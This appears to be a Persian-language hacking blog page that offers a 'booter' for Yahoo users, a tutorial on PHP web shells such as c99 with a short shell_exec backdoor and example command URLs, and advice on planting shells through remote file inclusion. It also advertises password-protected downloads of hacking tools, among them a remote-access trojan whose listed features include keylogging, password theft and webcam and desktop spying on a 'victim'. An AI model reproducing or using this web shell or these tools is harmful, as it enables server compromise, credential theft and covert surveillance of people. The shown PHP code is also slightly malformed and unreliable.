بهترین اموزش ها و مطالب در این سایت است

واسه اونایی که آی دی زیاد ندارن که کسی رو بوت کنند

اگه کار کرد یا مشکل داشت تو نظرات بگید.....

دانلود بوتر

دانلود

در اين مقاله شما با PHP Shellers آشنايی کامل پيدا خواهيد کرد .

PHP Shell ها با يک سری کدهای PHP نوشته شده اند و به هکر اين اجازه رو ميدن که در صورت آسيب پذير بودن server به ديگر سايتها و ديگر فايلها و پوشه های server دسترسی داشته باشه و بتونه فايل آپلود کنه يا فايلی رو بخونه يا پاک کنه يا توش چيزی بنويسه و Save کنه البته اين به پرميژنی که فايل يا پوشه داراست بستگی داره که بعدا با پرميژن آشنا ميشيم .

perm :

پرميژن ميزان دسترسی فايل يا پوشه رو تعئين ميکنه . که پرم 777 از همه با لاتر هستش و دسترسی

Read - Write - Execute داره يعنی اگه Folder باشه ميتونيم توی اون Folder فايل کپی کنيم يا بخونيم و ياDelete کنيم .

نکته/

اگر فايلی پرمی باشه که بشه توش Write کرد به اصطلاح بهش ميگن اين فايل Perm هستش !

چيزها يی که درباره Perm ها بايد بدانيم :

Perm هايی که با حرف d شروع ميشه يعنی اينکه پوشه هستند ( Folder ) که حرف d معرف Directory هستش مانند : drwxrwxrwx که اين پرم يک پرم 777 هستش . شما در اين Folder ها ميتوانيد فايل آپلود کنيد .

Perm هايی که با خط تيره ( - ) شروع ميشوند نشون ميدان که فايل هست نه Folder !

برای مثال : -rw-rw-rw- که شما با Edit کردن فايل ميتونيد توش هر کدی رو يا نوشته اي رو save کنيد .

حرف r به معنی Read و حرف W به معنی Write هستش .

اگر از شل c99 استفاده ميکنيد . کار شما راحتر هستش چرا که فايلها و دايرکتوری هايی که پرم هستن در C99 به رنگ سبز در قسمت مربوط به پرمها مشخص هستند و آنهايی که سفيد يا قزمز هستند به معنی پرم نبودن آنها هست .

پس يادتون باشه اگر دسترسی بالا نداريد ( Root ) پس فقط در دايرکتوری و فايلهايی که پرم هستند ميتوانيد فايل کپی کنيد يا آپلود کنيد . و يا در فايلها بنويسيد .

نکاتی در باره C99 :

بعد اينکه C99 رو جايی آپلود کرديم بايد به نکاتی توجه کنيم :

به بالای C99 دقت کنيد .

1 = اين قسمت برنامه هايی که WeB Server برای WeB استفاده ميکنه و همچنين ورژن php رو نشون ميده .

2 = Uname -a سرور که اطلاعاتی درباره server هست رو به ما ميده که من اينجا رو سيستم خودم

php shell رو بالا آوردم ( لوکال ) و از ويندوز استفاده ميکنم .

3 = اين قسمت خيلی مهّم هستش ! اگه Safe-Mode = On باشه server ميشه گفت Secure هستش ولی باز ميشه کاری کرد . در اين حالت هيچ کمندی قابل اجرا نيست و رفتن به دايرکتوری ديگه ممکن نيست .در چنين مواقع ميتوانيد از باگ های PHP Safe Mode Bypass که سيف مد رو دور ميزنه استفاده کنيد . ( در صورتی که پچ نشده باشه )

4 = اين قسمت دايرکتوری که در آن هستيم رو نشون ميد که من اينجا در درايو C خودم هستم و با پرم 777

5 = اين قسمت ميزان فضای خالی هارد رو مشخص ميکنه و ...

6 = اين قسمت درايو های هارد منو نشون ميده

به عکس زير دقت کنيد . قسمتی که با عدد 1 معرفی شده دارای 3 عمل به شرح زير ميباشد که روی يک فايل ميتواند اجرا بشود . ولی روی Folder ها وقت يک عمل Info قابل اجرست که اطلاعاتی راجع به Folder به ما ميدهد

به ترتيب از سمت چاپ به راست اينگونه است :

Info - Edit - Download

بسيار خوب فکر ميکنم اطلاعات کافی درمورد PHP shell ها دادم .

بياييد خودمون يک نمونه php shell بنويسيم که روی يک server که php ساپورت ميکنه Command اجرا کنه :

يک فايل php shell ميتواند Command را به صورتهای گوناگونی که موجود است Execute کنه روی يک server که به شرح زير هستند :

اينجا من از Shell_exec برای اجرا کردن Command خودم روی يک server استفاده ميکنم . يک Notepad باز کنيد و کدهای php زير را توش بنويسين .

$cmd=$_Get['cmd'];

$exec=shell_exec("$cmd");

//"$executing";

echo

?>

بسيار خوب حالا با پسوند php سيو کنيد و روی يک هاست آسيب پذير آپلود کنيد . و بعد از باز کرد صفحه شل

بعد از آدرس شل اين کد رو بنويسين ?cmd= بعد از (=) Command مورد نظر خود را اجرا کنيد

برای مثال : http://www.site.com/shell.php?cmd=ls => در لينوکس

http://www.site.com/shell.php?cmd=dir => در ويندوز

پيشنهاد ميکنم دستورات لينکوس و ويندوز رو بلد باشيد مخصوصا لينکوس که بيشتر server ها لينوکس هستند

ما shell های زيادی داريم بعضی از آنها را در زير ميبينيد :

در ضمن برای هک کردن سايتها از باگ هايی نظير remote File Inclusion شما ميتوانيد اين shell ها را با پسوند .txt يا بدون پسوند روی يک فضای خالی آپلود کنيد و در اين گونه باگ ها ازش استفاده کنيد !

يک نمونه فضای رايگان www.sharemation.com بعد از ثبت نام يادتون نره که فايل آپلود شده رو از Panel خودتون Share کنيد

توجه:

از دوستانی که  در زمینه هک تخصص ندارند  خواهش میکنم از این برنامه استفاده نکنند

Language: MS Basic v6 | Server Size: (Packed) 214 KB | Release Date: xx/01/2001

Download | Size: 232.28 KB | Password: terabit.blogfa.com

یکی از قویترین برنامه های هک سیستم

توجه:

از دوستانی که  در زمینه هک تخصص ندارند  خواهش میکنم از این برنامه استفاده نکنند

Language: MS Visual Basic v6 | Server Size: (Not Packed) 196 KB | Release Date: xx/01/2005

Download | Size: 106.87 KB | Password: terabit.blogfa.com

برنامه پیدا کردن ای پی برای شما عزیزان لطفا نظر بدهید دانلود کنید

دانلود

۱-مشاهده نالاین دسکتاب قربانی و فیلم برداری و گرفتن عکس از دسکتاب و دوریبن قربانی
۲-رستارت کردن, خاموش کردن, لوک اف کردن و ایستند بای کردن سیستم قربانی
۳-پرینت کردن یک صفحه و یا جمله دلخواه در سیتم قربانی بدون اطلاع وی
۴-مشاهده مشخصات سخت افزاری و نرم افزاری و تمام اطلاعات سیستم قربانی
۵-ارسال و اپلود کردن یک متن یا فایل بر سیستم قربانی
۶-مدیریت بر تمام تنضیمات سیستم قربانیو فعال و غیر فعال کردن انها
۷-بخش صدا  و یا موزیک دلخواه شما بصورت انلاین در سیستم قربانی
۸-مدیریت کامل بر run و رجیستری سیستم قربانی

۹-مشاهده تمام کلید های تایپ شده در سیستم قربانی
۱۰-مشاهده یوزرن نیم و پسورد یاهو مسنجر قربانی بصورت انلاین
۱۱-مشاده یوزر نیم و پسورد وبلاگ و یا سایت قربانی بصورت انلاین
۱۲-چت کردن با قربانی و ارسال پیام در زمان دلخواه
۱۳-مشاهده تمام پسوردهای ذخیره شده در سیستم قربانی
۱۴-مدیرت کامل بر اینترنت اکسپلورد قربانی و باز کردن صفحه اینترنتی دلخواه شما در سیستم وی
۱۵-حذف و یا اضافه کردن ادرس سایت دلخواه شما در فاوریت قربانی
۱۶-از کار انداختن و خاموش کردن دیواره اتش قربانی

دانلود

واسه پست امروز ۱۰۰ شکلک یاهو با فرمت گیف آوردم که هر جا که دلتون خواست می تونید ازش استفاده کنین .این شکلکها در موضوعات خاصی هستند مثلا :

ورزش

موسیقی

و ...

دانلودحجم ۳.۲ مگابایت که تو ۵۰ دقیقه دانلود میشه

=========>  پسورد همه فایلها : www.2por.ir <=========